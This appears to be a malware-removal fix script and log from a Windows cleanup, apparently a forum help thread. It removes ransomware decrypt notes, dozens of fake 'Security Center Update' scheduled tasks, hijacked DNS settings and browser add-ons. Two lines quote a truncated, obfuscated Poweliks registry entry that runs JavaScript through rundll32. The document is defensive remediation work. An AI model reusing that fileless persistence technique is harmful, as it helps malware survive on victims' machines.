2015-01-12 15:11 - 2015-01-12 15:11 - 0004224 _____ () C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT
2014-11-10 16:30 - 2014-11-10 16:30 - 0000448 ____H () C:\Users\Dorothy01\AppData\Roaming\????
2014-11-21 18:59 - 2014-11-21 18:59 - 0037439 _____ () C:\Users\Dorothy01\AppData\Local\893686b8
2014-11-12 18:01 - 2014-11-12 18:01 - 0008542 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-12 18:01 - 2014-11-12 18:01 - 0004214 _____ () C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-12-11 09:44 - 2014-12-11 21:24 - 0929536 _____ () C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat
2015-01-12 15:10 - 2015-01-12 15:10 - 0008562 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML
2015-01-12 15:10 - 2015-01-12 15:10 - 0001270 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG
2015-01-12 15:10 - 2015-01-12 15:10 - 0004224 _____ () C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT
2015-02-19 21:07 - 2015-02-19 21:07 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-21 03:30 - 2015-02-21 03:30 - 0023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2014-11-21 18:59 - 2014-11-21 18:59 - 0026477 _____ () C:\ProgramData\893686b8
2014-11-10 16:30 - 2015-02-01 20:32 - 0000648 _____ () C:\ProgramData\@system.temp
2014-11-10 16:30 - 2015-02-01 20:32 - 0000384 ____H () C:\ProgramData\@system3.att
2015-01-12 15:09 - 2015-01-12 15:09 - 0008562 _____ () C:\ProgramData\HELP_DECRYPT.HTML
2015-01-12 15:09 - 2015-01-12 15:09 - 0001270 _____ () C:\ProgramData\HELP_DECRYPT.PNG
2015-01-12 15:09 - 2015-01-12 15:09 - 0004224 _____ () C:\ProgramData\HELP_DECRYPT.TXT
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe
Task: {0AF68A16-8BB9-4884-9B4E-15D4F360BB7B} - System32\Tasks\Security Center Update - 2036164130 => C:\Users\Dorothy01\AppData\Roaming\Yhohybe\odhie.exe <==== ATTENTION
Task: {0C23B36F-F62C-434F-AA02-5ADBADF1858B} - System32\Tasks\Security Center Update - 2231539794 => C:\Users\Dorothy01\AppData\Roaming\Qaedxa\uwywweo.exe <==== ATTENTION
Task: {14653784-6568-4765-B81E-19CEB2C29EEF} - System32\Tasks\Security Center Update - 304447838 => C:\Users\Dorothy01\AppData\Roaming\Fyarxy\odrakal.exe <==== ATTENTION
Task: {1DE689D1-D5D6-4E99-9906-A33502FF48FF} - System32\Tasks\Security Center Update - 3156874879 => C:\Users\Dorothy01\AppData\Roaming\Ziqeexew\peisomr.exe <==== ATTENTION
Task: {29FD53A0-B0E0-4AC5-A535-A77BDBAB7300} - System32\Tasks\Security Center Update - 1511213846 => C:\Users\Dorothy01\AppData\Roaming\Ynopqual\epeht.exe <==== ATTENTION
Task: {34D40EAE-6659-4B8C-8F0E-5D9D8F76EE87} - System32\Tasks\Security Center Update - 3665910781 => C:\Users\Dorothy01\AppData\Roaming\Ekmiys\edanuzh.exe <==== ATTENTION
Task: {38AD3EE9-89B1-4FE8-BD3A-C268041E30AB} - System32\Tasks\Security Center Update - 3379427597 => C:\Users\Dorothy01\AppData\Roaming\Obmukany\otipky.exe <==== ATTENTION
Task: {46591690-E2C7-4AB5-90B8-0807BF83FA2E} - System32\Tasks\Security Center Update - 1219234967 => C:\Users\Dorothy01\AppData\Roaming\Hovoote\viywyke.exe <==== ATTENTION
Task: {4FE7F4B5-6216-4BF5-B69B-AE6DCAB85ACC} - System32\Tasks\Security Center Update - 951185298 => C:\Users\Dorothy01\AppData\Roaming\Tumiexcu\esinwii.exe <==== ATTENTION
Task: {506490F7-3376-4EFC-A901-586AA3303B44} - System32\Tasks\Security Center Update - 2325803103 => C:\Users\Dorothy01\AppData\Roaming\Adhoxi\vywipir.exe <==== ATTENTION
Task: {516E887F-D9AA-43E6-A51E-2905BC435DC3} - System32\Tasks\Security Center Update - 1528112639 => C:\Users\Dorothy01\AppData\Roaming\Kuseyd\ihnoxa.exe <==== ATTENTION
Task: {58DBAADD-4BFC-48F9-A19E-02A3DBE8DB7A} - System32\Tasks\Security Center Update - 2901739987 => C:\Users\Dorothy01\AppData\Roaming\Icxeewhu\avazx.exe <==== ATTENTION
Task: {62015E40-868F-450C-BB00-4F2987356F87} - System32\Tasks\Security Center Update - 3903236305 => C:\Users\Dorothy01\AppData\Roaming\Itufefv\qusieny.exe <==== ATTENTION
Task: {636CB7B6-8835-4A64-A923-ED55EB0D8640} - System32\Tasks\Security Center Update - 2512843633 => C:\Users\Dorothy01\AppData\Roaming\Ohvyev\yketpyu.exe <==== ATTENTION
Task: {6378A9C8-1406-4725-9242-44BFD048B5CE} - System32\Tasks\Security Center Update - 331106455 => C:\Users\Dorothy01\AppData\Roaming\Ymqiuky\mipiims.exe <==== ATTENTION
Task: {639A2A23-A522-40F7-AD5D-9F1245DF1A82} - System32\Tasks\Security Center Update - 2487970780 => C:\Users\Dorothy01\AppData\Roaming\Pevyliu\adelre.exe <==== ATTENTION
Task: {6BB0DD4F-FC46-49AF-B590-4F9F44C7E1A7} - System32\Tasks\rspahma => C:\Users\DOROTH~1\AppData\Local\Temp\utyczdi.exe <==== ATTENTION
Task: {70C6EC5A-CD9A-41DE-8073-EBF9E70D4E54} - System32\Tasks\Security Center Update - 3838766864 => C:\Users\Dorothy01\AppData\Roaming\Ezrydu\xyelefq.exe <==== ATTENTION
Task: {72165FBF-954D-4040-B5B5-BC5F9EED3A0E} - System32\Tasks\Security Center Update - 3216473386 => C:\Users\Dorothy01\AppData\Roaming\Zacosia\geulby.exe <==== ATTENTION
Task: {7430F638-B12A-445A-BBEF-5E8F514DF753} - System32\Tasks\Security Center Update - 699896687 => C:\Users\Dorothy01\AppData\Roaming\Itsefo\zyyzpii.exe <==== ATTENTION
Task: {7444E2A1-12CB-40A5-B56A-3E21543B4514} - System32\Tasks\Security Center Update - 3204526539 => C:\Users\Dorothy01\AppData\Roaming\Huqokayx\cazol.exe <==== ATTENTION
Task: {797B7B84-6E57-4129-A6A9-7A7099782A48} - System32\Tasks\Security Center Update - 242654636 => C:\Users\Dorothy01\AppData\Roaming\Maypyz\acoxv.exe <==== ATTENTION
Task: {7BB4C936-AFE9-405B-8288-876487348757} - System32\Tasks\Security Center Update - 116467704 => C:\Users\Dorothy01\AppData\Roaming\Zekubuab\usloe.exe <==== ATTENTION
Task: {7E32FCE3-C859-49A2-8E75-598B56230006} - System32\Tasks\Security Center Update - 4028262528 => C:\Users\Dorothy01\AppData\Roaming\Byloaq\uzodzay.exe <==== ATTENTION
Task: {833517E7-60C9-4EBA-B5E2-E1A24D86CE1A} - System32\Tasks\Security Center Update - 2519066445 => C:\Users\Dorothy01\AppData\Roaming\Ruyxku\vyfyr.exe <==== ATTENTION
Task: {86BAB3C1-BEB4-4F5B-9723-D319FC15EB44} - System32\Tasks\Security Center Update - 1810362612 => C:\Users\Dorothy01\AppData\Roaming\Senyzayr\ynval.exe <==== ATTENTION
Task: {8A4EFB2F-EFF1-4B4C-A1E0-641064B8C832} - System32\Tasks\Security Center Update - 3747167081 => C:\Users\Dorothy01\AppData\Roaming\Kybeuv\zywefu.exe <==== ATTENTION
Task: {91474FF9-C8FF-4F7E-B671-C5BAA856571C} - System32\Tasks\Security Center Update - 513270047 => C:\Users\Dorothy01\AppData\Roaming\Veepme\mearabi.exe <==== ATTENTION
Task: {9A50C6A9-6D3C-4A7F-B237-D2E34D535BAF} - System32\Tasks\Security Center Update - 4149247359 => C:\Users\Dorothy01\AppData\Roaming\Tapyara\ehubzy.exe <==== ATTENTION
Task: {9BD8C08F-7F0B-430E-AD7D-12988F4D4D76} - System32\Tasks\Security Center Update - 1179286971 => C:\Users\Dorothy01\AppData\Roaming\Ciokov\ekypu.exe <==== ATTENTION
Task: {9CD254AC-60CC-41FE-B8C7-884BAC0FA4A3} - System32\Tasks\Security Center Update - 1285267939 => C:\Users\Dorothy01\AppData\Roaming\Ytbynede\ebusfe.exe <==== ATTENTION
Task: {9DB27102-BD01-4DBA-AA72-192BAC09BFE7} - System32\Tasks\Security Center Update - 3201999599 => C:\Users\Dorothy01\AppData\Roaming\Ihywkead\olypozo.exe <==== ATTENTION
Task: {A24B621A-54AB-4FAF-9C35-FB0D87321DD4} - System32\Tasks\Security Center Update - 1259602875 => C:\Users\Dorothy01\AppData\Roaming\Egewtoi\kumysio.exe <==== ATTENTION
Task: {A31D10D4-B4CF-4475-B02B-0A9BEB4E6617} - System32\Tasks\Security Center Update - 2329648882 => C:\Users\Dorothy01\AppData\Roaming\Ecqootfi\inecimy.exe <==== ATTENTION
Task: {A3FB09EC-C469-45ED-8A04-7E9497A4358B} - System32\Tasks\Security Center Update - 532629427 => C:\Users\Dorothy01\AppData\Roaming\Mawywopo\yhrog.exe <==== ATTENTION
Task: {ACE571AA-4750-4BA4-9AB7-285B651F13E4} - System32\Tasks\Security Center Update - 578871115 => C:\Users\Dorothy01\AppData\Roaming\Wiudiz\areta.exe <==== ATTENTION
Task: {B1AE1850-9814-4733-A837-1BCFDCA93C2F} - System32\Tasks\Security Center Update - 1433702555 => C:\Users\Dorothy01\AppData\Roaming\Olaqduqo\oxico.exe <==== ATTENTION
Task: {B2111A5C-17C6-42AC-8232-C4BFBD5CEAE2} - System32\Tasks\Security Center Update - 2786531556 => C:\Users\Dorothy01\AppData\Roaming\Guhyanmo\usukrau.exe <==== ATTENTION
Task: {B31AB263-6E64-4AE6-9131-F03F3EB11C96} - System32\Tasks\Security Center Update - 2649167008 => C:\Users\Dorothy01\AppData\Roaming\Amcyocut\seovado.exe <==== ATTENTION
Task: {B69D26CC-F736-43EF-8678-4047B1182B5E} - System32\Tasks\Security Center Update - 4109173847 => C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf\ziexepo.exe <==== ATTENTION
Task: {BA2069FF-78E4-45BC-B55E-CD0ACD43F066} - System32\Tasks\Security Center Update - 2002689914 => C:\Users\Dorothy01\AppData\Roaming\Hyipfy\eheqqu.exe <==== ATTENTION
Task: {BB68D13D-D1D6-492F-8D8C-218D8F32F366} - System32\Tasks\Security Center Update - 3566967998 => C:\Users\Dorothy01\AppData\Roaming\Sequefb\apxuyb.exe <==== ATTENTION
Task: {C0214B00-381D-48C6-8657-2096534B77ED} - System32\Tasks\Security Center Update - 2047020247 => C:\Users\Dorothy01\AppData\Roaming\Woakduwa\vyvefiy.exe <==== ATTENTION
Task: {C8F0BD03-484C-4EA4-B730-E73FCF57C579} - System32\Tasks\Security Center Update - 1058146964 => C:\Users\Dorothy01\AppData\Roaming\Esisgyl\hupoto.exe <==== ATTENTION
Task: {CCE07978-A743-41CE-84CE-1E73B09468DB} - System32\Tasks\Security Center Update - 4056442320 => C:\Users\Dorothy01\AppData\Roaming\Ucucni\qyhyg.exe <==== ATTENTION
Task: {D272D6E1-FF48-4D29-8FED-3859A8299DC8} - System32\Tasks\Security Center Update - 446489216 => C:\Users\Dorothy01\AppData\Roaming\Gynika\daboop.exe <==== ATTENTION
Task: {DAF472B5-87C9-4EB7-BD1F-23897D28E7CF} - System32\Tasks\Security Center Update - 4131681425 => C:\Users\Dorothy01\AppData\Roaming\Upvukyy\qikoiqp.exe <==== ATTENTION
Task: {DD416C59-DA11-4673-95DF-6CCB71853F43} - System32\Tasks\Security Center Update - 2300971329 => C:\Users\Dorothy01\AppData\Roaming\Fuwutee\kikiap.exe <==== ATTENTION
Task: {F0BDD635-04A8-43FD-B541-D9182F90415D} - System32\Tasks\Security Center Update - 4105554909 => C:\Users\Dorothy01\AppData\Roaming\Wuwuec\xeabac.exe <==== ATTENTION
Task: {F9426B1C-C5B8-43C1-9B81-F5F6932587E9} - System32\Tasks\Security Center Update - 700698430 => C:\Users\Dorothy01\AppData\Roaming\Edutsoix\idyzsya.exe <==== ATTENTION
Task: {FA7D302B-25B4-4938-976B-AFD59ED105BC} - System32\Tasks\Security Center Update - 3992158093 => C:\Users\Dorothy01\AppData\Roaming\Onpyym\puzyril.exe <==== ATTENTION
Task: {FDF8C72F-4705-4C83-B0F3-47690D02FCBE} - System32\Tasks\Security Center Update - 4183678770 => C:\Users\Dorothy01\AppData\Roaming\Rifiewyn\puyrdo.exe <==== ATTENTION
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1427692388-1042374531-2795145444-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 251 more characters). <==== Poweliks?
Reboot:
end
*****************
 
Error: Restore point can only be created in normal mode.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\CrashReportSaver => value deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\pckunie" => Key deleted successfully.
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\pgkunge" => Key deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Windows\CurrentVersion\Run\\acikmao => value deleted successfully.
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Windows\CurrentVersion\Run\\dccwmote => value deleted successfully.
"C:\Users\Dorothy01\AppData\Local\acikmao.dll" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe => Moved successfully.
"HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}" => Key deleted successfully.
HKCR\CLSID\{5042c0a6-b247-11e4-bed4-089e013a632b} => Key not found. 
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL => Moved successfully.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => Key not found. 
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}}" => Key deleted successfully.
HKCR\CLSID\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} => Key not found. 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}" => Key deleted successfully.
HKCR\CLSID\{AA58ED58-01DD-4d91-8333-CF10577473F7} => Key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}}" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} => Key not found. 
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => value deleted successfully.
HKCR\CLSID\{2318C2B1-4965-11d4-9B18-009027A5CD4F} => Key not found. 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value deleted successfully.
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => Key not found. 
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}\\NameServer => value deleted successfully.
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}\\NameServer => value deleted successfully.
C:\Users\Dorothy01\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT => Moved successfully.
C:\Users\Dorothy01\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL => Moved successfully.
C:\HELP_DECRYPT.URL => Moved successfully.
C:\Users\Dorothy01\AppData\Local\pckunie.dll => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Adhoxi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\unpacked23206 => Moved successfully.
C:\ProgramData\bamgaq => Moved successfully.
C:\Users\Dorothy01\AppData\Local\{30112b75-e574-a6db-560c-8103291a0838} => Moved successfully.
C:\ProgramData\PenulErhig => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Kuseyd => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Guhyanmo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Veepme => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Kybeuv => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Wiudiz => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Tapyara => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Rifiewyn => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ynopqual => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ihywkead => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ekmiys => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Maypyz => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Fuwutee => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Fyarxy => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Zekubuab => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Wuwuec => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Byloaq => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Yhohybe => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hovoote => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Amcyocut => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Itsefo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Tumiexcu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ziqeexew => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Mawywopo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Icxeewhu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ucucni => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Edutsoix => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ruyxku => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Huqokayx => Moved successfully.
C:\ProgramData\TifwIdyo => Moved successfully.
C:\ProgramData\BolsiWelug => Moved successfully.
C:\ProgramData\PeboZnoli => Moved successfully.
C:\ProgramData\CecuSefki => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Itufefv => Moved successfully.
C:\ProgramData\FapziGguzq => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Senyzayr => Moved successfully.
C:\ProgramData\QiktiWuffu => Moved successfully.
C:\ProgramData\FadyOdyu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Zacosia => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ecqootfi => Moved successfully.
C:\ProgramData\TixoZuwu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ymqiuky => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Qaedxa => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Hyipfy => Moved successfully.
C:\ProgramData\EiniHubex => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Woakduwa => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Obmukany => Moved successfully.
C:\ProgramData\GuxeXowi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Gynika => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Egewtoi => Moved successfully.
C:\ProgramData\MokeVike => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Pevyliu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ciokov => Moved successfully.
C:\ProgramData\MesmAyof => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ohvyev => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Esisgyl => Moved successfully.
C:\ProgramData\LuqePana => Moved successfully.
C:\ProgramData\YuctAren => Moved successfully.
C:\ProgramData\GiqyoCxuko => Moved successfully.
C:\ProgramData\JoheMsum => Moved successfully.
C:\ProgramData\JahebSuhvo => Moved successfully.
C:\ProgramData\HozbEzpud => Moved successfully.
C:\ProgramData\FasuTuhu => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ytbynede => Moved successfully.
C:\ProgramData\NeheQiri => Moved successfully.
C:\ProgramData\KaseJolmi => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ezrydu => Moved successfully.
C:\ProgramData\UardiNdeca => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Sequefb => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Onpyym => Moved successfully.
C:\ProgramData\UopiJowv => Moved successfully.
C:\ProgramData\DervUvon => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Ezupuhaf => Moved successfully.
C:\ProgramData\PokuGehos => Moved successfully.
C:\ProgramData\NerxElyo => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Upvukyy => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\Olaqduqo => Moved successfully.
C:\ProgramData\PapoSutul => Moved successfully.
C:\ProgramData\MoruYemq => Moved successfully.
C:\ProgramData\JufhEnusi => Moved successfully.
C:\ProgramData\YansAjfir => Moved successfully.
C:\ProgramData\KitpUxijo => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Ugmedia => Moved successfully.
C:\ProgramData\XiceNnar => Moved successfully.
C:\ProgramData\TobaFisa => Moved successfully.
C:\Users\Dorothy01\AppData\Local\tmp1461 => Moved successfully.
C:\ProgramData\@system.temp => Moved successfully.
C:\ProgramData\@system3.att => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\1B477081.reg => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\893686b8 => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Roaming\HELP_DECRYPT.TXT => Moved successfully.
 
"C:\Users\Dorothy01\AppData\Roaming\????" directory move:
 
Could not move "C:\Users\Dorothy01\AppData\Roaming\????" directory. => Scheduled to move on reboot.
 
C:\Users\Dorothy01\AppData\Local\893686b8 => Moved successfully.
C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT => Moved successfully.
C:\Users\Dorothy01\AppData\Local\f5e83w4ef.dat => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.HTML => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.PNG => Moved successfully.
C:\Users\Dorothy01\AppData\Local\HELP_DECRYPT.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\pckunie.dll" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\pgkunge.dll => Moved successfully.
C:\ProgramData\893686b8 => Moved successfully.
"C:\ProgramData\@system.temp" => File/Directory not found.
"C:\ProgramData\@system3.att" => File/Directory not found.
C:\ProgramData\HELP_DECRYPT.HTML => Moved successfully.
C:\ProgramData\HELP_DECRYPT.PNG => Moved successfully.
C:\ProgramData\HELP_DECRYPT.TXT => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\ARS.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
"C:\Users\Dorothy01\AppData\Local\Temp\getmhost.exe" => File/Directory not found.
C:\Users\Dorothy01\AppData\Local\Temp\ivbhim.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\jre-8u31-windows-au.exe => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\Dorothy01\AppData\Local\Temp\tmp7A9C.tmp.exe => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0AF68A16-8BB9-4884-9B4E-15D4F360BB7B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0AF68A16-8BB9-4884-9B4E-15D4F360BB7B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2036164130 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2036164130" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0C23B36F-F62C-434F-AA02-5ADBADF1858B}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C23B36F-F62C-434F-AA02-5ADBADF1858B}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 2231539794 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 2231539794" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{14653784-6568-4765-B81E-19CEB2C29EEF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14653784-6568-4765-B81E-19CEB2C29EEF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 304447838 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 304447838" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1DE689D1-D5D6-4E99-9906-A33502FF48FF}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1DE689D1-D5D6-4E99-9906-A33502FF48FF}" => Key deleted successfully.
C:\Windows\System32\Tasks\Security Center Update - 3156874879 => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Security Center Update - 3156874879" => Key deleted successfully.
